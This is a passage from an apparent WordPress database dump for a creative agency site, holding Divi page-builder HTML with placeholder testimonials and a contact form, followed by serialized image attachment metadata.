srcset=\"https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?w=800&ssl=1 800w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=300%2C300&ssl=1 300w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=150%2C150&ssl=1 150w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=768%2C768&ssl=1 768w, https://i2.wp.com/www.whatthehell.co/wp-content/uploads/2020/08/Artboard-5-1.jpg?resize=480%2C480&ssl=1 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" data-recalc-dims=\"1\" /></noscript></span>\n			</div>\n			</div> <!-- .et_pb_column -->\n				</div> <!-- .et_pb_row -->\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_19 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_23 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_38  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_25  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">From Our Clients</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_26  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_24\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_39  et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_testimonial et_pb_testimonial_0 et_animated clearfix  et_pb_text_align_left et_pb_bg_layout_light et_pb_icon_off et_pb_testimonial_no_image et_pb_testimonial_no_bg\">\n				\n				\n				<div style=\"background-image:url(https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png)\" class=\"et_pb_testimonial_portrait\"></div>\n				<div class=\"et_pb_testimonial_description\">\n					<div class=\"et_pb_testimonial_description_inner\"><div class=\"et_pb_testimonial_content\">“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”</div></div> <!-- .et_pb_testimonial_description_inner -->\n					<span class=\"et_pb_testimonial_author\">Mitch Skolnik</span>\n					<p class=\"et_pb_testimonial_meta\"><span class=\"et_pb_testimonial_position\">operation Director</span><span class=\"et_pb_testimonial_separator\">,</span> <span class=\"et_pb_testimonial_company\">Elegant Themes</span></p>\n				</div> <!-- .et_pb_testimonial_description -->\n			</div> <!-- .et_pb_testimonial --><div class=\"et_pb_module et_pb_testimonial et_pb_testimonial_1 et_animated clearfix  et_pb_text_align_left et_pb_bg_layout_light et_pb_icon_off et_pb_testimonial_no_image et_pb_testimonial_no_bg\">\n				\n				\n				<div style=\"background-image:url(https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png)\" class=\"et_pb_testimonial_portrait\"></div>\n				<div class=\"et_pb_testimonial_description\">\n					<div class=\"et_pb_testimonial_description_inner\"><div class=\"et_pb_testimonial_content\">“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”</div></div> <!-- .et_pb_testimonial_description_inner -->\n					<span class=\"et_pb_testimonial_author\">Andrel Nahaev</span>\n					<p class=\"et_pb_testimonial_meta\"><span class=\"et_pb_testimonial_position\">operation Director</span><span class=\"et_pb_testimonial_separator\">,</span> <span class=\"et_pb_testimonial_company\">Elegant Themes</span></p>\n				</div> <!-- .et_pb_testimonial_description -->\n			</div> <!-- .et_pb_testimonial -->\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_40  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_testimonial et_pb_testimonial_2 et_animated clearfix  et_pb_text_align_left et_pb_bg_layout_light et_pb_icon_off et_pb_testimonial_no_image et_pb_testimonial_no_bg\">\n				\n				\n				<div style=\"background-image:url(https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png)\" class=\"et_pb_testimonial_portrait\"></div>\n				<div class=\"et_pb_testimonial_description\">\n					<div class=\"et_pb_testimonial_description_inner\"><div class=\"et_pb_testimonial_content\">“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”</div></div> <!-- .et_pb_testimonial_description_inner -->\n					<span class=\"et_pb_testimonial_author\">Eduard Ungureanu</span>\n					<p class=\"et_pb_testimonial_meta\"><span class=\"et_pb_testimonial_position\">Tech Support</span><span class=\"et_pb_testimonial_separator\">,</span> <span class=\"et_pb_testimonial_company\">Elegant Themes</span></p>\n				</div> <!-- .et_pb_testimonial_description -->\n			</div> <!-- .et_pb_testimonial --><div class=\"et_pb_module et_pb_testimonial et_pb_testimonial_3 et_animated clearfix  et_pb_text_align_left et_pb_bg_layout_light et_pb_icon_off et_pb_testimonial_no_image et_pb_testimonial_no_bg\">\n				\n				\n				<div style=\"background-image:url(https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png)\" class=\"et_pb_testimonial_portrait\"></div>\n				<div class=\"et_pb_testimonial_description\">\n					<div class=\"et_pb_testimonial_description_inner\"><div class=\"et_pb_testimonial_content\">“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”</div></div> <!-- .et_pb_testimonial_description_inner -->\n					<span class=\"et_pb_testimonial_author\">Tom Ewer</span>\n					<p class=\"et_pb_testimonial_meta\"><span class=\"et_pb_testimonial_position\">Blogger</span><span class=\"et_pb_testimonial_separator\">,</span> <span class=\"et_pb_testimonial_company\">Elegant Themes</span></p>\n				</div> <!-- .et_pb_testimonial_description -->\n			</div> <!-- .et_pb_testimonial -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_20 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_25 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_41  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_27 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Let&#8217;s Start Something newSay Hello!</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_28 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_27 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_42  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				\n			<div id=\"et_pb_contact_form_0\" class=\"et_pb_module et_pb_contact_form_1 et_animated et_pb_contact_form_container clearfix\" data-form_unique_num=\"1\">\n				\n				\n				\n				<div class=\"et-pb-contact-message\"></div>\n				\n				<div class=\"et_pb_contact\">\n					<form class=\"et_pb_contact_form clearfix\" method=\"post\" action=\"https://wthtest1.in8.cdn-alpha.com/?s=1\">\n						<p class=\"et_pb_contact_field et_pb_contact_field_4 et_pb_contact_field_last\" data-id=\"name\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_name_1\" class=\"et_pb_contact_form_label\">Name</label>\n				<input type=\"text\" id=\"et_pb_contact_name_1\" class=\"input\" value=\"\" name=\"et_pb_contact_name_1\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"name\" placeholder=\"Name\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_5 et_pb_contact_field_last\" data-id=\"mobile_no\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_mobile_no_1\" class=\"et_pb_contact_form_label\">Mobile No</label>\n				<input type=\"text\" id=\"et_pb_contact_mobile_no_1\" class=\"input\" value=\"\" name=\"et_pb_contact_mobile_no_1\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"mobile_no\" placeholder=\"Mobile No\" pattern=\"[0-9s-]{10,10}\" title=\"Only numbers allowed.Minimum length: 10 characters. Maximum length: 10 characters.\" maxlength=\"10\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_6 et_pb_contact_field_last\" data-id=\"email\" data-type=\"email\">\n				\n				\n				<label for=\"et_pb_contact_email_1\" class=\"et_pb_contact_form_label\">Email Address</label>\n				<input type=\"text\" id=\"et_pb_contact_email_1\" class=\"input\" value=\"\" name=\"et_pb_contact_email_1\" data-required_mark=\"required\" data-field_type=\"email\" data-original_id=\"email\" placeholder=\"Email Address\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_7 et_pb_contact_field_last\" data-id=\"message\" data-type=\"text\">\n				\n				\n				<label for=\"et_pb_contact_message_1\" class=\"et_pb_contact_form_label\">Message</label>\n				<textarea name=\"et_pb_contact_message_1\" id=\"et_pb_contact_message_1\" class=\"et_pb_contact_message input\" data-required_mark=\"required\" data-field_type=\"text\" data-original_id=\"message\" placeholder=\"Message\"></textarea>\n			</p>\n						<input type=\"hidden\" value=\"et_contact_proccess\" name=\"et_pb_contactform_submit_1\"/>\n						<div class=\"et_contact_bottom_container\">\n							\n			<div class=\"et_pb_contact_right\">\n				<p class=\"clearfix\">\n					<span class=\"et_pb_contact_captcha_question\">12 + 9</span> = <input type=\"text\" size=\"2\" class=\"input et_pb_contact_captcha\" data-first_digit=\"12\" data-second_digit=\"9\" value=\"\" name=\"et_pb_contact_captcha_1\" data-required_mark=\"required\" autocomplete=\"off\">\n				</p>\n			</div><!-- .et_pb_contact_right -->\n							<button type=\"submit\" name=\"et_builder_submit_button\" class=\"et_pb_contact_submit et_pb_button et_pb_custom_button_icon\" data-icon=\"&#x45;\">Send</button>\n						</div>\n						<input type=\"hidden\" id=\"_wpnonce-et-pb-contact-form-submitted-1\" name=\"_wpnonce-et-pb-contact-form-submitted-1\" value=\"7705b7c209\" /><input type=\"hidden\" name=\"_wp_http_referer\" value=\"/?s=1\" />\n					</form>\n				</div> <!-- .et_pb_contact -->\n			</div> <!-- .et_pb_contact_form_container -->\n			\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --></p>\n'),(835,564,'_et_pb_truncate_post_date','2022-01-15 17:33:25'),(836,564,'_et_builder_version','VB|Divi|4.5.2'),(837,564,'_et_pb_show_page_creation','off'),(838,470,'_wp_attachment_image_alt','creative agency'),(839,620,'_et_pb_row_layout','1_2,1_2'),(840,620,'_et_pb_built_for_post_type','page'),(841,621,'_et_pb_row_layout','1_2,1_2'),(842,621,'_et_pb_built_for_post_type','page'),(843,629,'_et_pb_row_layout','4_4'),(844,629,'_et_pb_built_for_post_type','page'),(845,630,'_et_pb_row_layout','4_4'),(846,630,'_et_pb_built_for_post_type','page'),(847,564,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:16:\"et-gf-montserrat\";s:137:\"Montserrat:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}}'),(850,663,'_wp_attached_file','2020/08/800x800-b1-1.jpg'),(851,663,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:24:\"2020/08/800x800-b1-1.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"800x800-b1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"800x800-b1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"800x800-b1-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:24:\"800x800-b1-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:24:\"800x800-b1-1-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:24:\"800x800-b1-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:24:\"800x800-b1-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:24:\"800x800-b1-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:24:\"800x800-b1-1-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(852,663,'_wp_attachment_image_alt','digital agency in delhi'),(853,667,'_wp_attached_file','2020/08/800x800-a1-1.jpg'),(854,667,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:24:\"2020/08/800x800-a1-1.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"800x800-a1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"800x800-a1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"800x800-a1-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:24:\"800x800-a1-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:24:\"800x800-a1-1-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:24:\"800x800-a1-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:24:\"800x800-a1-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:24:\"800x800-a1-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:24:\"800x800-a1-1-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(855,667,'_wp_attachment_image_alt','digital agency in delhi'),(856,673,'_wp_attached_file','2020/08/800x800-Fl-copy-2.jpg'),(857,673,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:29:\"2020/08/800x800-Fl-copy-2.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"800x800-Fl-copy-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"800x800-Fl-copy-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"800x800-Fl-copy-2-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:29:\"800x800-Fl-copy-2-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:29:\"800x800-Fl-copy-2-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:29:\"800x800-Fl-copy-2-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:29:\"800x800-Fl-copy-2-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:29:\"800x800-Fl-copy-2-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:29:\"800x800-Fl-copy-2-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(858,673,'_wp_attachment_image_alt','Flyer Design'),(859,693,'_wp_attached_file','2020/08/Artboard.png'),(860,693,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:128;s:6:\"height\";i:128;s:4:\"file\";s:20:\"2020/08/Artboard.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(861,693,'_wp_attachment_image_alt','Mritunjya'),(862,695,'_wp_attached_file','2020/08/Artboard-Copy-3.png'),(863,695,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:128;s:6:\"height\";i:128;s:4:\"file\";s:27:\"2020/08/Artboard-Copy-3.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(864,695,'_wp_attachment_image_alt',''),(865,698,'_wp_attached_file','2020/08/Artboard-2.png'),(866,698,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:128;s:6:\"height\";i:128;s:4:\"file\";s:22:\"2020/08/Artboard-2.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(867,698,'_wp_attachment_image_alt','Mritunjya'),(868,702,'_wp_attached_file','2020/08/Artboard-Copy-4.png'),(869,702,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:128;s:6:\"height\";i:128;s:4:\"file\";s:27:\"2020/08/Artboard-Copy-4.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(870,702,'_wp_attachment_image_alt','P Sarvanan'),(871,705,'_wp_attached_file','2020/08/Artboard-Copy-5.png'),(872,705,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:128;s:6:\"height\";i:128;s:4:\"file\";s:27:\"2020/08/Artboard-Copy-5.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(873,705,'_wp_attachment_image_alt','Sandeep'),(874,723,'_wp_attached_file','2020/08/Artboard-1.jpg'),(875,723,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:800;s:4:\"file\";s:22:\"2020/08/Artboard-1.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Artboard-1-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Artboard-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:22:\"Artboard-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:22:\"Artboard-1-600x675.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:22:\"Artboard-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:22:\"Artboard-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:22:\"Artboard-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:22:\"Artboard-1-480x640.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(876,723,'_wp_attachment_image_alt','Shubham'),(877,726,'_wp_attached_file','2020/08/Artboard-Copy-6.jpg'),(878,726,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:800;s:4:\"file\";s:27:\"2020/08/Artboard-Copy-6.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-6-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-6-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-6-600x675.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-6-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-6-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-6-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:27:\"Artboard-Copy-6-480x640.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(879,726,'_wp_attachment_image_alt','Dhiraj'),(880,727,'_wp_attached_file','2020/08/Artboard-2.jpg'),(881,727,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:800;s:4:\"file\";s:22:\"2020/08/Artboard-2.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Artboard-2-225x300.jpg\";s